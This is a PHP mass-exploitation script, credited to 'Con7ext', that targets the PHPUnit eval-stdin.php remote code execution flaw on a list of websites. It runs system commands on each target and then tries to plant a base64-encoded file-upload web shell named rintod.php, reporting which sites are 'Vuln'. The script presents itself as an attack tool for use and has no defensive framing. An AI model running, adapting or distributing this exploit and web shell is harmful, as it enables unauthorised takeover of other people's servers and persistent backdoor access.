phpunitmass.php

1. <?php
2. // Created By Rintod as Con7ext
3. define("SHELLCODE", "PD9waHAgDQppZihpc3NldCgkX0ZJTEVTWydyaW50b2QnXVsnbmFtZSddKSl7DQogICRuYW1lID0gJF9GSUxFU1sncmludG9kJ11bJ25hbWUnXTsNCiAgJG50b2QgPSAkX0ZJTEVTWydyaW50b2QnXVsndG1wX25hbWUnXTsNCiAgQG1vdmVfdXBsb2FkZWRfZmlsZSgkbnRvZCwgJG5hbWUpOw0KICBlY2hvICRuYW1lOw0KfWVsc2V7DQogIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0IGVuY3R5cGU9bXVsdGlwYXJ0L2Zvcm0tZGF0YT48aW5wdXQgdHlwZT1maWxlIG5hbWU9cmludG9kPjxpbnB1dCB0eXBlPXN1Ym1pdCB2YWx1ZT1VcGxvYWQ+IjsNCn0gDQo/Pg==");
4. define("SHELL", "rintod.php");
5. define("PAYLOAD", "/vendor/phpunit/phpunit/src/Util/PHP/");
6. function req($url){
7. $ch = curl_init();
8. curl_setopt($ch, CURLOPT_URL, $url);
9. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
10. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
11. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
12. $c = curl_exec($ch);
13. $v = curl_getinfo($ch, CURLINFO_HTTP_CODE);
14. return [
15. "head" => $v,
16. "body" => $c
17. ];
18. }
19. function exploit($url, $mew){
20. $ch = curl_init();
21. curl_setopt($ch, CURLOPT_URL, $url);
22. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
23. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
24. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
25. curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET");
26. curl_setopt($ch, CURLOPT_POSTFIELDS, $mew);
27. $c = curl_exec($ch);
28. $v = curl_getinfo($ch, CURLINFO_HTTP_CODE);
29. return [
30. "head" => $v,
31. "body" => $c
32. ];
33. }
34. @parse_str(implode("&", array_slice($argv, 1)), $_GET);
35. $list = @$_GET["list"];
36. $meong = @explode("\n", @file_get_contents($list));
37. $bl = "\033[0;34m";
38. $gr = "\033[0;32m";
39. $re = "\033[0;31m";
40. echo "${bl}[=] This Tool Created By Con7ext [=]\n";
41. foreach($meong as $site){
42. $mes = '<?php system("ls -la"); ?>';
43. $mos = exploit($site.PAYLOAD."eval-stdin.php", $mes);
44. if($mos["head"] == 200){
45. if(preg_match("/Windows.php|window.php|Template/", $mos["body"])){
46. echo "${gr}[+] ${site} -> Vuln\n";
47. echo "${gr}Result #\n";
48. echo $mos["body"];
49. echo "${bl}[!] Uploading Shell...\n";
50. exploit($site.PAYLOAD."eval-stdin.php", "<?php system('echo ".SHELLCODE." >> ".SHELL."'); ?>");
51. echo "${bl}[!] Checking Shell...\n";
52. $mong = req($site.PAYLOAD.SHELL);
53. if($mong["head"] == 200){
54. echo "${gr}[+] Success Uploading Shell ... ".$site.PAYLOAD.SHELL."\n\n";
55. }
56. else{
57. echo "${re}[-] Failed Uploading Shell ... ERROR CODE: ".$mong["head"]."\n\n";
58. }
59. }
60. else{
61. echo "${re}[-] $site -> Not Support With Command Execute {SYSTEM} ... ${bl}[!] You can try with another cmd like POPEN,PROC_OPEN [MANUAL]\n";
62. }
63. }else{
64. echo "${re}[-] ${site} -> 404 / Not Vuln...\n";
65. }
66. }
67. echo "\033[1;37m";